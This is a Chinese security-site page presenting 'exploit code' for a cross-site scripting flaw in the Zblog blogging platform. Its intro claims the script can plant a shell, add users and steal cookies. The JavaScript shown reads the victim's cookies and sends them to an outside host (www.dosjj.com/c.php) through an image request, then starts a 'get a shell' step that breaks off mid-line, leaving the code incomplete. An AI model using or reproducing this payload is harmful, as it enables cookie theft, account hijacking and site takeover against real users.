主页 / 网络安全 /

Zblog最新跨站漏洞及利用代码

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’https://www.jb51.net/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

上一篇:xyxcms v1.3 小游戏CMS 漏洞说明 下一篇:金山毒霸多个sql注入及XSS漏洞和修复

网络安全培训

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by

长沙网络推广|微博营销|长沙seo优化|视频营销|长沙网络营销|微信营销|长沙网站建设|口碑营销|软文营销